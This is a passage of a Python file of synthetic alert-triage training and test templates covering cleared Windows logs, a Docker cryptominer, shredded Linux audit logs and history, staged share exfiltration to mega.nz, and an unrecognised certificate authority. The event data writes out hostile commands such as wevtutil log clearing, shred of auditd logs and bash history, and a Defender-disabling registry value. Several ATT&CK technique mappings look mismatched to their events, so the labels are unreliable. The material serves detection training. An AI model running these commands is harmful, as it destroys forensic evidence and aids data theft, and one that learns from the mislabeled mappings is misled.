      ("process_creation", "cmd.exe executed wevtutil cl Security and wevtutil cl System", '{"cmd": "wevtutil cl Security & wevtutil cl System"}'),
      ("registry_modification", "HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware set to 1", '{"key": "DisableAntiSpyware", "value": 1}')],
     [("Administrative account actively disabled endpoint antivirus and real-time protection.", ["EVT-001", "EVT-003"], "critical"),
      ("Attacker purged core Windows Security and System event logs to cover tracks.", ["EVT-002"], "critical")],
     "Deliberate disabling of endpoint defenses combined with systematic event log purging confirms active malicious intrusion.",
     [("T1059.001", "PowerShell", "Execution", ["EVT-001"]),
      ("T1490", "Inhibit System Recovery", "Impact", ["EVT-001", "EVT-003"])],
     [("Immediately revoke session and disable account it_admin02.", "immediate", "Halt attacker administrative access."),
      ("Re-enable Windows Defender and isolate server {hostname}.", "immediate", "Restore security baseline.")], None),

    ("TF-114", "Unauthorized Docker Container Spawning Crypto Miner", "admin_workflows", "alert_triage", "likely_malicious", "train", "suspicious_vs_likely_malicious", "Linux", "server", "devops",
     "Docker Daemon Running Unregistered Container with High CPU Load", "high", "Containerized Cryptomining",
     [("process_creation", "dockerd launched unauthorized container image xmrig/monero from public registry", '{"image": "docker.io/xmrig/monero", "flags": "-d"}'),
      ("network_connection", "container established outbound Stratum protocol socket to pool.supportxmr.com:3333", '{"dest_host": "pool.supportxmr.com", "dest_port": 3333}')],
     [("Docker daemon initiated unapproved public container image designed for cryptocurrency mining.", ["EVT-001"], "high"),
      ("Container actively communicated with external mining pool via Stratum protocol.", ["EVT-002"], "high")],
     "Unauthorized cryptocurrency mining workload deployed to production Linux compute infrastructure.",
     [("T1071.001", "Web Protocols", "Command and Control", ["EVT-002"])],
     [("Stop and remove unauthorized mining container immediately.", "immediate", "Reclaim compute resources."),
      ("Audit DevOps account API credentials and Docker socket exposure.", "high", "Investigate deployment origin.")], None),

    ("TF-115", "Attacker Clearing Linux Auditd Logs and Shredding Bash History", "admin_workflows", "alert_triage", "confirmed_malicious", "test", None, "Linux", "server", "root",
     "Root Session Shredding Audit Logs and History Files", "critical", "Log Purging Defense Evasion",
     [("process_creation", "root executed shred -u -z /var/log/audit/audit.log", '{"cmd": "shred -u -z /var/log/audit/audit.log"}'),
      ("process_creation", "root executed shred -u ~/.bash_history && history -c", '{"cmd": "shred -u ~/.bash_history && history -c"}'),
      ("file_modification", "Auditd service halted and log file removed from disk", '{"file": "/var/log/audit/audit.log", "deleted": true}')],
     [("System administrator session invoked secure shred utility to permanently destroy auditd logs.", ["EVT-001", "EVT-003"], "critical"),
      ("Command history wiped to obstruct forensic investigation.", ["EVT-002"], "critical")],
     "Deliberate, unrecoverable destruction of system audit logs and interactive command history confirms host takeover.",
     [("T1078", "Valid Accounts", "Defense Evasion", ["EVT-001", "EVT-003"])],
     [("Isolate Linux server {hostname} from network immediately.", "immediate", "Preserve remaining volatile memory."),
      ("Perform physical memory acquisition and forensic triage of disk.", "immediate", "Extract forensic artifacts.")], None),

    ("TF-116", "Mass File Compression and Staging in Hidden Directory", "admin_workflows", "alert_triage", "confirmed_malicious", "train", None, "Windows", "server", "admin01",
     "7-Zip Compressing Network Share Shares to Hidden Directory", "critical", "Exfiltration Staging",
     [("process_creation", "7z.exe executed a -pSecret123 C:\\PerfLogs\\archive.7z \\\\SRV-FILE-01\\Confidential\\*", '{"cmd": "7z.exe a -pSecret123 C:\\\\PerfLogs\\\\archive.7z \\\\\\\\SRV-FILE-01\\\\Confidential\\\\*"}'),
      ("file_modification", "Password-protected archive archive.7z created with size 4.2 GB", '{"path": "C:\\\\PerfLogs\\\\archive.7z", "size_bytes": 4509715200}'),
      ("network_connection", "curl.exe initiated outbound multi-part upload to mega.nz cloud storage", '{"dest_host": "mega.nz", "bytes": 4509715200}')],
     [("Proprietary network shares compressed into password-protected archive in hidden system folder.", ["EVT-001", "EVT-002"], "critical"),
      ("Massive multi-gigabyte staging archive exfiltrated to external mega.nz cloud repository.", ["EVT-003"], "critical")],
     "Unambiguous mass data theft: bulk compression of sensitive file shares followed by external cloud exfiltration.",
     [("T1048.003", "Exfiltration Over Unencrypted Non-C2 Protocol", "Exfiltration", ["EVT-001", "EVT-002"]),
      ("T1567.002", "Exfiltration to Cloud Storage", "Exfiltration", ["EVT-003"])],
     [("Terminate outbound cloud connection and block mega.nz at proxy.", "immediate", "Halt data exfiltration."),
      ("Disable compromised user account admin01 enterprise-wide.", "immediate", "Lock out adversary.")], None),

    ("TF-117", "Certbot Renewal with Unrecognized Remote CA Certificate", "admin_workflows", "investigation_planning", "insufficient_evidence", "train", "suspicious_vs_insufficient_evidence", "Linux", "server", "root",
     "SSL Certificate Issued by Non-Standard Certificate Authority", "low", "Unrecognized CA Certificate",
     [("scheduled_task", "systemd timer certbot.timer completed certificate renewal", '{"timer": "certbot.timer", "status": "completed"}'),
      ("file_modification", "New certificate written with Issuer CN 'GlobalTrust Dynamic CA'", '{"issuer": "GlobalTrust Dynamic CA", "expiry": "2027-01-01"}')],
     [("Certbot renewed web server certificate, but issuing Certificate Authority is not in approved corporate PKI list.", ["EVT-001", "EVT-002"], "low")],
     "Could be an unannounced corporate PKI issuer transition or unauthorized certificate deployment.", [],
     [("Contact enterprise PKI engineering team to verify whether 'GlobalTrust Dynamic CA' is authorized.", "medium", "Verify CA issuer.")],
     ["Corporate PKI root trust store", "Certbot configuration in /etc/letsencrypt/cli.ini"]),
]

print(f"Chunk 4 loaded: {len(CHUNK_4)} templates.")
